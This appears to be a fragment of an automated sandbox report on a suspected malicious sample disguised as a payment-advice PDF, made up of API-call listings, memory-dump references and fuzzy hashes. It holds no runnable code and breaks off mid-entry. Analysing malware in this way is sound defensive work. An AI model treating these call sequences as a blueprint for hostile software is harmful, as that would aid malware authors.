                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              • GetCursorPos.USER32(?), ref: 008B713B
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008B7199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: ae2603c159e48998bb86ccfa95938d10729f0c86d819c4e5d74db9e32e26b4f8
                                                              • Instruction ID: c4e769e53a19a03cd41eed7f550195e8b64569c2079e1a48acca1b1086ace616
                                                              • Opcode Fuzzy Hash: ae2603c159e48998bb86ccfa95938d10729f0c86d819c4e5d74db9e32e26b4f8
                                                              • Instruction Fuzzy Hash: A331B472505305ABD720DF18C849F9BB7AAFFC9314F000519F585D7291D770EA09CB92
                                                              APIs
                                                                • Part of subcall function 008980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008980C0
                                                                • Part of subcall function 008980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008980CA
                                                                • Part of subcall function 008980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008980D9
                                                                • Part of subcall function 008980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008980E0
                                                                • Part of subcall function 008980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008980F6
                                                              • GetLengthSid.ADVAPI32(?,00000000,0089842F), ref: 008988CA
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008988D6
                                                              • HeapAlloc.KERNEL32(00000000), ref: 008988DD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 008988F6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0089842F), ref: 0089890A
                                                              • HeapFree.KERNEL32(00000000), ref: 00898911
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              • Opcode ID: 673cb7a15907c3ce5ae323bbaa43308289a838f9cef82558a1cf15aca80695aa
                                                              • Instruction ID: 17f9595761836eaeaf58c9438b51ca45f4015fc8e5ef7e81830b1112152a6d0a
                                                              • Opcode Fuzzy Hash: 673cb7a15907c3ce5ae323bbaa43308289a838f9cef82558a1cf15aca80695aa
                                                              • Instruction Fuzzy Hash: 89119D7160160AEFEF11AFA4DC09FBE7B79FB46315F18402AE946E7211CB329900DB60
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008985E2
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 008985E9
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008985F8
                                                              • CloseHandle.KERNEL32(00000004), ref: 00898603
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00898632
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00898646
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: a5e447390dff30d2220c7dab27170538ba47ccf24f94b2f94a79fe827f244db0
                                                              • Instruction ID: ed7343a0408c47151aa5c97889aa5f8adebb6f285cb96db88d8b32ff27d90855
                                                              • Opcode Fuzzy Hash: a5e447390dff30d2220c7dab27170538ba47ccf24f94b2f94a79fe827f244db0
                                                              • Instruction Fuzzy Hash: 44114A7250024AEBEF029FA4DD49FDA7BB9FB49304F084065FE05A2161C7719D64DB60
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0089B7B5
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0089B7C6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089B7CD
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0089B7D5
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0089B7EC
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0089B7FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 9cc684734bd2eae96dcfc1b2c8d3f9d00a9ac3c74915e57b436ab76ded557a34
                                                              • Instruction ID: e2910268a79f9fbb26f466c753c4b014926f19d83668ae52e1085057b9b551d2
                                                              • Opcode Fuzzy Hash: 9cc684734bd2eae96dcfc1b2c8d3f9d00a9ac3c74915e57b436ab76ded557a34
                                                              • Instruction Fuzzy Hash: 45017175A00209BBEF10ABE69D45E5EBFB9FB48711F044066FA04E7291D6309C00CF91
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00860193
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0086019B
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008601A6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008601B1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008601B9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008601C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 65a52df6d2eb34ebe2a78b4fe88c75519c02912139119d70425ab734ea6cff67
                                                              • Instruction ID: bf19f4a420a88808a42b6bbd1cfa769d52ae37c4e7c3aab11a9f46077d44d8da
                                                              • Opcode Fuzzy Hash: 65a52df6d2eb34ebe2a78b4fe88c75519c02912139119d70425ab734ea6cff67
                                                              • Instruction Fuzzy Hash: 92016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C47942C7F5A864CBE5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008A53F9
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008A540F
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 008A541E
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A542D
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A5437
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A543E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 371ab7b2955f85c28582b29ce9868e83c7bb1efa56ba0c0738296fea3f6408fc
                                                              • Instruction ID: 13559c67f48f224dece4c7c44ba42dc89b292d386cfde12105a633f61787551f
                                                              • Opcode Fuzzy Hash: 371ab7b2955f85c28582b29ce9868e83c7bb1efa56ba0c0738296fea3f6408fc
                                                              • Instruction Fuzzy Hash: FCF06D72241558BBF3215BA2DC0DEAB7A7DFBCAB11F00016AFA05D105296B11A0186B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 008A7243
                                                              • EnterCriticalSection.KERNEL32(?,?,00850EE4,?,?), ref: 008A7254
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00850EE4,?,?), ref: 008A7261
                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00850EE4,?,?), ref: 008A726E
                                                                • Part of subcall function 008A6C35: CloseHandle.KERNEL32(00000000,?,008A727B,?,00850EE4,?,?), ref: 008A6C3F
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008A7281
                                                              • LeaveCriticalSection.KERNEL32(?,?,00850EE4,?,?), ref: 008A7288
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 7518e08ad1ec4d22b3b24bfb5feb85da08b993184be40c6e124c0fed6fecd7f5
                                                              • Instruction ID: f956aef7d8c6f240d224289c845f7aa4dfd44ddd627c56d5dea763ee6dd5a43f
                                                              • Opcode Fuzzy Hash: 7518e08ad1ec4d22b3b24bfb5feb85da08b993184be40c6e124c0fed6fecd7f5
                                                              • Instruction Fuzzy Hash: 9EF05E36540612EBF7121B64ED4CEDA773BFF45712B140532F703914A6DB765811DB50
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089899D
                                                              • UnloadUserProfile.USERENV(?,?), ref: 008989A9
                                                              • CloseHandle.KERNEL32(?), ref: 008989B2
                                                              • CloseHandle.KERNEL32(?), ref: 008989BA
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008989C3
                                                              • HeapFree.KERNEL32(00000000), ref: 008989CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: cd02521338f3a960ef7c3cd0ad822e49ef86e76094d76e32019a4915a8a9dc05
                                                              • Instruction ID: db511dcc78546455d9254ca85b93bcfdf89667963bf15cb70fb95b6d5a0e56aa
                                                              • Opcode Fuzzy Hash: cd02521338f3a960ef7c3cd0ad822e49ef86e76094d76e32019a4915a8a9dc05
                                                              • Instruction Fuzzy Hash: 57E0C236004401FBEA021FF2EC0CD0ABB7AFB89322B148232F31981171CB329420DB50
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 008B8613
                                                              • CharUpperBuffW.USER32(?,?), ref: 008B8722
                                                              • VariantClear.OLEAUT32(?), ref: 008B889A
                                                                • Part of subcall function 008A7562: VariantInit.OLEAUT32(00000000), ref: 008A75A2
                                                                • Part of subcall function 008A7562: VariantCopy.OLEAUT32(00000000,?), ref: 008A75AB
                                                                • Part of subcall function 008A7562: VariantClear.OLEAUT32(00000000), ref: 008A75B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 60a0820f4e606af09c96633d9999452fb802bda1658d7e92ea4a54146b1d5e2e
                                                              • Instruction ID: f75accf47c7e270a09d54b00622a4611fe7b8c21f8c1bcb56fa67e545f5b5560
                                                              • Opcode Fuzzy Hash: 60a0820f4e606af09c96633d9999452fb802bda1658d7e92ea4a54146b1d5e2e
                                                              • Instruction Fuzzy Hash: 14912670604305DFCB10DF28C48499ABBE8FB89714F14896EF99ACB362DB31E905CB52
                                                              APIs
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                              • _memset.LIBCMT ref: 008A2B87
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A2BB6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A2C69
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008A2C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: b3fa16a26db0f7d866a4f525846311eb4a69afef1337f77696b4a8739129136c
                                                              • Instruction ID: 0575c7549065c257c7a85bef8ee84c7ee7909ae289c5e792e02f4ea2f22b905f
                                                              • Opcode Fuzzy Hash: b3fa16a26db0f7d866a4f525846311eb4a69afef1337f77696b4a8739129136c
                                                              • Instruction Fuzzy Hash: F35198716083119FE7349F2CC845A6FB7E9FB9A320F040A29F995D3591DB60CD04CBA2
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0089D5D4
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0089D60A
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0089D61B
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0089D69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: a7059e9e830869d118edb841a7f9eefbbd9c1913b37a9d746e35785329766bbb
                                                              • Instruction ID: 6e10f2b4a15578f195f32b37d5ca0ac325eb47b46b96efdf71aba7bda977a55c
                                                              • Opcode Fuzzy Hash: a7059e9e830869d118edb841a7f9eefbbd9c1913b37a9d746e35785329766bbb
                                                              • Instruction Fuzzy Hash: 4C416DB1600305EFDF06EF64C884A9A7BB9FF54314B1981AAA909DF206D7B1D944CBE4
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A27C0
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008A27DC
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 008A2822
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00905890,00000000), ref: 008A286B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 580148f4841de1cdb86b1f7adf063be53ad4e6a3011eee8a74bc32e19eaadbf9
                                                              • Instruction ID: da979408a234ef752d512862d030a83d0f51e74142752ecf4fb5bf355a9b5613
                                                              • Opcode Fuzzy Hash: 580148f4841de1cdb86b1f7adf063be53ad4e6a3011eee8a74bc32e19eaadbf9
                                                              • Instruction Fuzzy Hash: B9418D706043419FEB20DF2CC844B1ABBE9FF86314F14492DF9A5D7692DB34A905CB52
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008BD7C5
                                                                • Part of subcall function 0084784B: _memmove.LIBCMT ref: 00847899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower_memmove
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 3425801089-567219261
                                                              • Opcode ID: 5c9b35f0b18338d53d41984e601c570fa774fd9e0f21959aa7a96e18deec77e1
                                                              • Instruction ID: 2dce55434be28fd3df4abdf2bffd5b3b87f419cde386f7545fa3c2c012c7d977
                                                              • Opcode Fuzzy Hash: 5c9b35f0b18338d53d41984e601c570fa774fd9e0f21959aa7a96e18deec77e1
                                                              • Instruction Fuzzy Hash: 74316E71904619ABCF00EFA8C8519FEB7B5FF14720B108A29E965D77D2EB71A905CB80
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00898F14
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00898F27
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00898F57
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_memmove$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 365058703-1403004172
                                                              • Opcode ID: c19467d33c0127423480f58f849b1f8ab448e04196a63fbdd6afe410b9a632f0
                                                              • Instruction ID: cdf24815fc4255f4ad30e6fb348e80ed16dac0444b9a2411a71024381e409a5e
                                                              • Opcode Fuzzy Hash: c19467d33c0127423480f58f849b1f8ab448e04196a63fbdd6afe410b9a632f0
                                                              • Instruction Fuzzy Hash: 6921E171A00109BEEF14ABB48C45DFFBB69FF06360B084529F421E72E1DF394809D610
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008B184C
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B1872
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008B18A2
                                                              • InternetCloseHandle.WININET(00000000), ref: 008B18E9
                                                                • Part of subcall function 008B2483: GetLastError.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B2498
                                                                • Part of subcall function 008B2483: SetEvent.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: 57f3d36c2c11156999d0627a2e7fd84dd278444331541c88b7ca4ffd5ac17ae5
                                                              • Instruction ID: 368f81777b963d98abbd2c73ef4bae46dcf19613b66a8f32c3d00060f6aa49c6
                                                              • Opcode Fuzzy Hash: 57f3d36c2c11156999d0627a2e7fd84dd278444331541c88b7ca4ffd5ac17ae5
                                                              • Instruction Fuzzy Hash: E2217CB1500208BFEB219B649C99EFB76AEFB48744F50413AF905EA640EA309E0597A1
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008C6461
                                                              • LoadLibraryW.KERNEL32(?), ref: 008C6468
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008C647D
                                                              • DestroyWindow.USER32(?), ref: 008C6485
                                                              Strings
                                                              Memory Dump Source
